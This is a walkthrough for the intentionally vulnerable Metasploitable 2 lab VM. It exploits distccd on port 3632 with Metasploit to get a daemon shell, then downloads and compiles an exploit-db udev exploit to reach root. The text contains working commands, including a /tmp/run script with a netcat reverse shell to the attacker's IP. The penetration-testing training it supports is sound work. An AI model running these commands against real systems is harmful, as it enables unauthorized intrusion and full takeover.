Metasploitable 2: Port 3632 distccd Exploit and Privilege Escalation

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3632/tcp  open  distccd?

What is distccd?

Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile.

OK, time to search Metasploit:

msf > search distccd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

Let’s run the exploit:

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(distcc_exec) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i5VOR5zoE9EvGttx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i5VOR5zoE9EvGttx\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:46436) at 2013-11-19 10:59:04 +0000

whoami
daemon

As we can see from the “whoami” we have achieved a daemon shell.

Now we will escalate our privilege from daemon to root using the 141 Local Privilege Escalation Exploit.

Firstly we get the exploit:

wget http://www.exploit-db.com/download/8572
--02:23:28--  http://www.exploit-db.com/download/8572
           => `8572'
Resolving www.exploit-db.com... 23.23.129.3, 23.23.150.193
Connecting to www.exploit-db.com|23.23.129.3|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/8572/ [following]
--02:23:29--  http://www.exploit-db.com/download/8572/
           => `index.html'
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 2,768 (2.7K) [application/txt]

    0K ..                                                    100%  414.77 KB/s

02:23:30 (414.77 KB/s) - `index.html' saved [2768/2768]

mv index.html exploit.c
gcc exploit.c -o exploit

The exploit instructions are:

Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].

The exploit will execute /tmp/run as root so throw whatever payload you want in there.

Put simply we must find the PID of udevd and subtract 1:

pgrep udevd
3125

Now we need to open Netcat in a new Terminal in port listening mode:

:~# nc -vlp 12345
listening on [any] 12345 ...

Now to the exploit (Note the second line is your attacking IP and the Netcat port and line three is the PID minus one.

echo "#!/bin/sh" > /tmp/run
echo "nc -e /bin/sh 192.168.1.78 12345" >> /tmp/run
./exploit 3124

And our Netcat listener should come alive:

192.168.1.103: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.78] from (UNKNOWN) [192.168.1.103] 55574
whoami
root

And as you can see we are root!